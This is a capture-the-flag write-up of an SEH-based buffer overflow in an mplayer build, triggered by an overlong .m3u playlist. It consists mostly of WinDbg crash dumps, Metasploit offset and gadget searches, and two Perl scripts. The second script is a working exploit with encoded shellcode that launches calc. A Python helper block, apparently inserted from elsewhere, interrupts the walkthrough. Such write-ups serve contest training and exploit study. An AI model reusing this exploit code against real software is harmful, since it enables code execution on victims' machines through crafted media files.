2011 Xidian (西电) Network Attack and Defense Competition: vulnerability-discovery challenge, debugging notes
Thunder woke me up, so I got up and played with vulnerabilities instead.
The second overflow challenge from 2011 is, annoyingly, bound to 127.0.0.1. Is that supposed to be a local overflow or a remote one? What were the challenge authors thinking? Setting that aside, let's play with the vulnerability-discovery challenge first.
The archive contains an mplayer build; the challenge description reads:
Install this vulnerable software
Goals:
1. Observe why the software vulnerability occurs
2. Try to exploit the vulnerability to produce a PoC
3. The attack must be carried out on Win7 with UAC disabled and must bypass DEP (DEP must be shown enabled before the exploit is demonstrated)
4. The exploit must go through SEH
When submitting, hand in a screen recording and a write-up; the write-up is worth 15 points and the recording 15 points.
You have to find the vulnerability yourself. Players tend to break in places like skins and m3u files, so start by generating a malformed file containing an overlong string and fuzzing with it.
root@kali:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 5000 > ~/Desktop/5k.m3u
0:000> g
ModLoad: 76300000 7631d000 C:/WINDOWS/system32/IMM32.DLL
ModLoad: 62c20000 62c29000 C:/WINDOWS/system32/LPK.DLL
ModLoad: 73fa0000 7400b000 C:/WINDOWS/system32/USP10.dll
ModLoad: 10000000 10035000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/unrar.dll
ModLoad: 74680000 746cb000 C:/WINDOWS/system32/MSCTF.dll
ModLoad: 77bd0000 77bd8000 C:/WINDOWS/system32/version.dll
ModLoad: 73640000 7366e000 C:/WINDOWS/system32/msctfime.ime
ModLoad: 5adc0000 5adf7000 C:/WINDOWS/system32/uxtheme.dll
ModLoad: 5adc0000 5adf7000 C:/WINDOWS/system32/UxTheme.dll
(89c.80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0022eab4 ecx=ffffffff edx=0022e6c0 esi=7ffddbf8 edi=61423161
eip=7c921278 esp=0022e6ac ebp=0022e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlInitAnsiString+0x1b:
7c921278 f2ae repne scas byte ptr es:[edi]
0:000> !exchain
0022ffe0: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:/WINDOWS/system32/kernel32.dll -
kernel32!ValidateLocale+2b0 (7c839af0)
Invalid exception stack at ffffffff
0:000> d fs:[0]
003b:00000000 e0 ff 22 00 00 00 23 00-00 a0 22 00 00 00 00 00 .."...#...".....
003b:00000010 00 1e 00 00 00 00 00 00-00 d0 fd 7f 00 00 00 00 ................
003b:00000020 9c 08 00 00 80 00 00 00-00 00 00 00 88 2c 25 00 .............,%.
003b:00000030 00 e0 fd 7f 06 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040 98 64 55 e2 00 00 00 00-00 00 00 00 00 00 00 00 .dU.............
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0:000> d 0022ffe0
0022ffe0 ff ff ff ff f0 9a 83 7c-f0 6f 81 7c 00 00 00 00 .......|.o.|....
0022fff0 00 00 00 00 00 00 00 00-40 11 40 00 00 00 00 00 ........@.@.....
00230000 41 63 74 78 20 00 00 00-01 00 00 00 b8 24 00 00 Actx ........$..
00230010 c4 00 00 00 00 00 00 00-20 00 00 00 00 00 00 00 ........ .......
00230020 14 00 00 00 01 00 00 00-06 00 00 00 34 00 00 00 ............4...
00230030 14 01 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
00230040 00 00 00 00 00 00 00 00-00 00 00 00 02 00 00 00 ................
00230050 00 00 00 00 00 00 00 00-00 00 00 00 14 02 00 00 ................
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0022e6c8 7c81380a 61423161 0022ecbc 00000003 ntdll!RtlInitAnsiString+0x1b
*** ERROR: Module load completed but symbols could not be loaded for image00400000
0022e948 00561818 61423161 0022e974 0022eb88 kernel32!FindFirstFileA+0x21
0022e990 7c9461dc 003e52a0 7c96b1be 003e5338 image00400000+0x161818
0022ea74 7c98e57f 003e0000 00000000 003e52a0 ntdll!iswdigit+0x2bf
0022eaa8 7c98f888 003e0608 61306161 61613161 ntdll!RtlpNtMakeTemporaryKey+0x6bdb
0022eb18 35646134 61366461 64613764 39646138 ntdll!RtlpNtMakeTemporaryKey+0x7ee4
0022eb1c 61366461 64613764 39646138 61306561 <Unloaded_eme.dll>+0x35646133
0022eb20 64613764 39646138 61306561 65613165 0x61366461
0022eb24 39646138 61306561 65613165 33656132 0x64613764
0022eb28 61306561 65613165 33656132 61346561 <Unloaded_eme.dll>+0x39646137
0022eb2c 65613165 33656132 61346561 65613565 0x61306561
0022eb30 33656132 61346561 65613565 37656136 0x65613165
0022eb34 61346561 65613565 37656136 61386561 <Unloaded_eme.dll>+0x33656131
0022eb38 65613565 37656136 61386561 66613965 0x61346561
0022eb3c 37656136 61386561 66613965 31666130 0x65613565
0022eb40 61386561 66613965 31666130 61326661 <Unloaded_eme.dll>+0x37656135
0022eb44 66613965 31666130 61326661 66613366 0x61386561
0022eb48 31666130 61326661 66613366 35666134 0x66613965
0022eb4c 61326661 66613366 35666134 61366661 <Unloaded_eme.dll>+0x3166612f
0022eb50 66613366 35666134 61366661 66613766 0x61326661
0:000> g
(89c.80): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0022eab4 ecx=ffffffff edx=0022e6c0 esi=7ffddbf8 edi=61423161
eip=7c921278 esp=0022e6ac ebp=0022e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!RtlInitAnsiString+0x1b:
7c921278 f2ae repne scas byte ptr es:[edi]
0:000> !exchain
0022ffe0: kernel32!ValidateLocale+2b0 (7c839af0)
Invalid exception stack at ffffffff
The program window has already gone; WinDbg caught the exception the program raised and stepped into the exception-handling path. The memory around esp has been overwritten by our pattern string, but the exception-handler record on the stack at 0022ffe0 has not been touched. Let's take a look:
0:000> d esp
0022e6ac 74 e9 22 00 a5 e0 80 7c-c0 e6 22 00 61 31 42 61 t."....|..".a1Ba
0022e6bc 03 00 00 00 00 00 00 00-61 31 42 61 48 e9 22 00 ........a1BaH.".
0022e6cc 0a 38 81 7c 61 31 42 61-bc ec 22 00 03 00 00 00 .8.|a1Ba..".....
0022e6dc f2 4f 83 7c 00 00 00 00-6a 00 36 00 41 00 6a 00 .O.|....j.6.A.j.
0022e6ec 37 00 41 00 6a 00 38 00-41 00 6a 00 39 00 41 00 7.A.j.8.A.j.9.A.
0022e6fc 6b 00 30 00 41 00 6b 00-00 00 00 00 00 00 00 00 k.0.A.k.........
0022e70c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0022e71c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0022ff4c 35 47 6a 36 47 6a 37 47-6a 38 47 6a 39 47 6b 30 5Gj6Gj7Gj8Gj9Gk0
0022ff5c 47 6b 31 47 6b 32 47 6b-33 47 6b 34 47 6b 35 47 Gk1Gk2Gk3Gk4Gk5G
0022ff6c 6b 00 a7 00 94 ff 22 00-ff ff ff ff 90 ff 22 00 k…..”…….”.
0022ff7c 00 00 00 00 00 00 00 00-40 11 40 00 00 00 00 00 ……..@.@…..
0022ff8c 20 b0 62 81 00 00 00 00-60 2a 3e 00 00 00 00 00 .b…..`*>…..
0022ff9c 00 e0 fd 7f c0 ff 22 00-58 11 40 00 02 00 00 00 ……”.X.@…..
0:000>
0022ffac 00 00 00 00 ba dc 92 7c-e4 6f 81 7c fe ff ff ff …….|.o.|….
0022ffbc 09 00 00 00 f0 ff 22 00-e7 6f 81 7c 00 00 00 00 ……”..o.|….
0022ffcc f9 b3 d1 77 00 e0 fd 7f-05 00 00 c0 c8 ff 22 00 …w……….”.
0022ffdc d0 e2 22 00 ff ff ff ff-f0 9a 83 7c f0 6f 81 7c ..”……..|.o.|
0022ffec 00 00 00 00 00 00 00 00-00 00 00 00 40 11 40 00 …………@.@.
0022fffc 00 00 00 00 41 63 74 78-20 00 00 00 01 00 00 00 ….Actx …….
0023000c b8 24 00 00 c4 00 00 00-00 00 00 00 20 00 00 00 .$………. …
0023001c 00 00 00 00 14 00 00 00-01 00 00 00 06 00 00 00 …………….
From the dump we can see the long string; it is still about 150 bytes short of overwriting the exception handler record on the stack, so generate a bigger malformed file:
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 6000 > ~/Desktop/6k.m3u
Run the program again:
0:000> !exchain
0022ffe0: 6f47366f
Invalid exception stack at 47356f47
0:000> d fs:[0]
*** ERROR: Module load completed but symbols could not be loaded for image00400000
003b:00000000 e0 ff 22 00 00 00 23 00-00 a0 22 00 00 00 00 00 ..”…#…”…..
003b:00000010 00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 …………….
003b:00000020 5c 07 00 00 60 0a 00 00-00 00 00 00 88 2c 25 00 /…`……..,%.
003b:00000030 00 60 fd 7f ce 00 00 00-00 00 00 00 00 00 00 00 .`…………..
003b:00000040 98 64 55 e2 00 00 00 00-00 00 00 00 00 00 00 00 .dU………….
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
0:000> d 0022ffe0
0022ffe0 47 6f 35 47 6f 36 47 6f-37 47 6f 38 47 6f 39 47 Go5Go6Go7Go8Go9G
0022fff0 70 30 47 70 31 47 70 32-47 70 33 47 70 34 47 70 p0Gp1Gp2Gp3Gp4Gp
00230000 41 63 74 78 20 00 00 00-01 00 00 00 b8 24 00 00 Actx ……..$..
00230010 c4 00 00 00 00 00 00 00-20 00 00 00 00 00 00 00 …….. …….
00230020 14 00 00 00 01 00 00 00-06 00 00 00 34 00 00 00 …………4…
00230030 14 01 00 00 01 00 00 00-00 00 00 00 00 00 00 00 …………….
00230040 00 00 00 00 00 00 00 00-00 00 00 00 02 00 00 00 …………….
00230050 00 00 00 00 00 00 00 00-00 00 00 00 14 02 00 00 …………….
The SEH record has been overwritten successfully.
Now let's take control of EIP; first locate the overflow offsets:
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 6f47366f
[*] Exact match at offset 5119
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 47356f47
[*] Exact match at offset 5115
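To see where 5115 and 5119 come from, here is an added Python re-implementation of the cyclic pattern and offset lookup (example code written for this note, not Metasploit's own tools); it maps the two dwords shown by `!exchain` back to file offsets and checks that they form one contiguous SEH record.

```python
import itertools
import string
import struct

# Added example for this note (not Metasploit's own code): a Python
# re-implementation of what pattern_create.rb / pattern_offset.rb do, so the
# 5115 / 5119 offsets above can be checked without the tools. The pattern is
# the sequence of 3-byte triples Aa0 Aa1 ... Aa9 Ab0 ... Az9 Ba0 ... Zz9.


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern (repeats after 20280)."""
    triples = itertools.cycle(
        u + l + d
        for u in string.ascii_uppercase
        for l in string.ascii_lowercase
        for d in string.digits
    )
    out = bytearray()
    while len(out) < length:
        out += next(triples).encode()
    return bytes(out[:length])


def pattern_offset(pattern, dword):
    """Offset of a 32-bit value as WinDbg displayed it (little-endian), so
    0x6f47366f is searched for as the bytes b"o6Go"."""
    off = pattern.find(struct.pack("<I", dword))
    if off < 0:
        raise ValueError("%08x is not in the pattern" % dword)
    return off


def seh_layout(pattern, exchain_next, exchain_handler):
    """Map the record's next-pointer and handler (the two dwords seen with
    `!exchain` / `d`) to file offsets; checks they are 4 bytes apart, i.e.
    one contiguous copy of the string overwrote the whole record."""
    nseh_off = pattern_offset(pattern, exchain_next)
    seh_off = pattern_offset(pattern, exchain_handler)
    if seh_off != nseh_off + 4:
        raise ValueError("handler is not adjacent to the next-pointer")
    return nseh_off, seh_off


def short_jump_target(nseh_off, disp):
    """Where a 2-byte `jmp short disp` at nseh_off lands: EIP after the jmp is
    nseh_off + 2, so "\\xeb\\x06" skips the two NOPs and the 4-byte handler."""
    return nseh_off + 2 + disp


if __name__ == "__main__":
    pat = pattern_create(6000)
    print(seh_layout(pat, 0x47356f47, 0x6f47366f))  # (5115, 5119)
    print(short_jump_target(5115, 6))               # 5123, first byte after seh
```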
The basic layout of the overflow should look like this:

                   \xeb\x06\x90\x90     pop pop ret address
["A" x 5115]       [     nseh      ]    [        seh        ]    [ shellcode ]

There does not seem to be enough room for the shellcode after the SEH record, so this time we have to jump backwards!
Fortunately the string before it is contiguous and has not been corrupted.
Now let's build a simple PoC first:
"\x90" x 5115 + "\xeb\x06\x90\x90" + [pop pop ret] + "\x90\x90\x90\xcc"
The pop pop ret address is taken from one of the program's own DLLs; the OllyDbg plugin isn't installed, so SafeSEH is ignored for now.
Executable search path is:
ModLoad: 00400000 00b26000 image00400000
ModLoad: 7c920000 7c9b6000 ntdll.dll
ModLoad: 7c800000 7c91d000 C:/WINDOWS/system32/kernel32.dll
ModLoad: 6ad40000 6b72e000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/avcodec-52.dll
ModLoad: 00bd0000 00bfa000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/avutil-50.dll
ModLoad: 77be0000 77c38000 C:/WINDOWS/system32/msvcrt.dll
ModLoad: 62480000 62492000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/pthreadGC2.dll
ModLoad: 71a40000 71a4b000 C:/WINDOWS/system32/WSOCK32.DLL
ModLoad: 71a20000 71a37000 C:/WINDOWS/system32/WS2_32.dll
ModLoad: 71a10000 71a18000 C:/WINDOWS/system32/WS2HELP.dll
ModLoad: 77da0000 77e49000 C:/WINDOWS/system32/ADVAPI32.dll
ModLoad: 77e50000 77ee2000 C:/WINDOWS/system32/RPCRT4.dll
ModLoad: 77fc0000 77fd1000 C:/WINDOWS/system32/Secur32.dll
ModLoad: 64940000 649f6000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/avformat-52.dll
ModLoad: 6d080000 6d0b0000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/postproc-51.dll
ModLoad: 6d780000 6d7db000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/swscale-0.dll
ModLoad: 77180000 77283000 C:/WINDOWS/WinSxS/X86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.3744_x-ww_d9c64cc6/COMCTL32.DLL
ModLoad: 77ef0000 77f38000 C:/WINDOWS/system32/GDI32.dll
ModLoad: 77d10000 77d9f000 C:/WINDOWS/system32/USER32.dll
……
Use the trusty msfpescan to find a pop pop ret address:
root@scan:~/Desktop# /opt/metasploit/app/msfpescan -p avcodec-52.dll
[avcodec-52.dll]
0x6ad410b4 pop ebx; pop ebp; ret
0x6ad42838 pop edi; pop ebp; ret
0x6ad42a8e pop edi; pop ebp; ret
0x6ad42c5d pop edi; pop ebp; ret
0x6ad43304 pop edi; pop ebp; ret
0x6ad4340f pop edi; pop ebp; ret
0x6ad44d17 pop edi; pop ebp; ret
0x6ad44e8c pop edi; pop ebp; ret
0x6ad44eae pop edi; pop ebp; ret
0x6ad45048 pop edi; pop ebp; ret
0x6ad45093 pop edi; pop ebp; ret
0x6ad45128 pop edi; pop ebp; ret
0x6ad453cc pop edi; pop ebp; ret
With the return address in hand, let's write the PoC.
#!/usr/bin/perl
# 2011 Xidian University network attack and defense contest, vulnerability discovery challenge: PoC
# by c4rp3nt3r@0x50sec.org
#
use strict;
use warnings;

my $junk    = "\x90" x 5115;            # padding up to the SEH record
my $nseh    = "\xeb\x06\x90\x90";       # next SEH: short jmp +6 over the handler
my $seh     = pack('V', 0x6ad410b4);    # pop pop ret from avcodec-52.dll
my $payload = "\x90\x90\x90\xcc";       # int3 marks where execution lands
open(my $FH, '>', 'poc.m3u') or die "poc.m3u: $!";
binmode($FH);
print $FH $junk . $nseh . $seh . $payload . "\r\n";
close($FH);
Run the program and drag the generated "poc.m3u" onto it: the PoC runs successfully.
0:000> g
(894.cec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0022eab4 ecx=ffffffff edx=0022e6c0 esi=7ffdfbf8 edi=90909090
eip=7c921278 esp=0022e6ac ebp=0022e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlInitAnsiString+0x1b:
7c921278 f2ae repne scas byte ptr es:[edi]
0:000> g
(894.cec): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=7c9232a8 ecx=6ad410b4 edx=7c9232bc esi=00000000 edi=00000000
eip=0022ffeb esp=0022e2e8 ebp=0022e3c4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
<Unloaded_eme.dll>+0x22ffea:
0022ffeb cc int 3
0:000> d eip-4
0022ffe7 6a 90 90 90 cc 31 00 00-00 00 00 00 00 00 00 00 j….1……….
0022fff7 00 40 11 40 00 00 00 00-00 41 63 74 78 20 00 00 .@.@…..Actx ..
00230007 00 01 00 00 00 b8 24 00-00 c4 00 00 00 00 00 00 ……$………
00230017 00 20 00 00 00 00 00 00-00 14 00 00 00 01 00 00 . …………..
00230027 00 06 00 00 00 34 00 00-00 14 01 00 00 01 00 00 …..4……….
00230037 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
00230047 00 00 00 00 00 02 00 00-00 00 00 00 00 00 00 00 …………….
00230057 00 00 00 00 00 14 02 00-00 9c 01 00 00 00 00 00 …………….
0:000> d eip-40
0022ffab 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 …………….
0022ffbb 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 …………….
0022ffcb 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 …………….
0022ffdb 90 90 90 90 90 eb 06 90-90 b4 10 d4 6a 90 90 90 …………j…
0022ffeb cc 31 00 00 00 00 00 00-00 00 00 00 00 40 11 40 .1………..@.@
0022fffb 00 00 00 00 00 41 63 74-78 20 00 00 00 01 00 00 …..Actx ……
0023000b 00 b8 24 00 00 c4 00 00-00 00 00 00 00 20 00 00 ..$………. ..
0023001b 00 00 00 00 00 14 00 00-00 01 00 00 00 06 00 00 …………….
All right, now let's write an exploit that pops up the calculator; SafeSEH and DEP are left aside for now. DEP could be bypassed with ROP, but since this is not the real contest I won't bother here.
#!/usr/bin/perl
# 2011 Xidian University network attack and defense contest, vulnerability discovery challenge: SEH exploit
# by c4rp3nt3r@0x50sec.org
#
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc
use strict;
use warnings;

my $load =
    "\xba\xa3\xfd\xdd\x88\xd9\xf7\xd9\x74\x24\xf4\x5f\x31\xc9" .
    "\xb1\x32\x31\x57\x12\x83\xef\xfc\x03\xf4\xf3\x3f\x7d\x06" .
    "\xe3\x49\x7e\xf6\xf4\x29\xf6\x13\xc5\x7b\x6c\x50\x74\x4c" .
    "\xe6\x34\x75\x27\xaa\xac\x0e\x45\x63\xc3\xa7\xe0\x55\xea" .
    "\x38\xc5\x59\xa0\xfb\x47\x26\xba\x2f\xa8\x17\x75\x22\xa9" .
    "\x50\x6b\xcd\xfb\x09\xe0\x7c\xec\x3e\xb4\xbc\x0d\x91\xb3" .
    "\xfd\x75\x94\x03\x89\xcf\x97\x53\x22\x5b\xdf\x4b\x48\x03" .
    "\xc0\x6a\x9d\x57\x3c\x25\xaa\xac\xb6\xb4\x7a\xfd\x37\x87" .
    "\x42\x52\x06\x28\x4f\xaa\x4e\x8e\xb0\xd9\xa4\xed\x4d\xda" .
    "\x7e\x8c\x89\x6f\x63\x36\x59\xd7\x47\xc7\x8e\x8e\x0c\xcb" .
    "\x7b\xc4\x4b\xcf\x7a\x09\xe0\xeb\xf7\xac\x27\x7a\x43\x8b" .
    "\xe3\x27\x17\xb2\xb2\x8d\xf6\xcb\xa5\x69\xa6\x69\xad\x9b" .
    "\xb3\x08\xec\xf1\x42\x98\x8a\xbc\x45\xa2\x94\xee\x2d\x93" .
    "\x1f\x61\x29\x2c\xca\xc6\xc5\x66\x57\x6e\x4e\x2f\x0d\x33" .
    "\x13\xd0\xfb\x77\x2a\x53\x0e\x07\xc9\x4b\x7b\x02\x95\xcb" .
    "\x97\x7e\x86\xb9\x97\x2d\xa7\xeb\xfb\xb0\x3b\x77\xfc";

# pad the front so that padding + shellcode ends exactly at the SEH record
my $length = 5115 - length($load);
my $junk   = "\x90" x $length;
my $nseh   = "\xeb\x06\x90\x90";        # next SEH: short jmp +6 over the handler
my $seh    = pack('V', 0x6ad410b4);     # pop pop ret from avcodec-52.dll
my $pay    = "\xe9\x0c\xff\xff\xff";    # jmp back to shellcode
open(my $FH, '>', 'exp.m3u') or die "exp.m3u: $!";
binmode($FH);
print $FH $junk . $load . $nseh . $seh . $pay . "\r\n";
close($FH);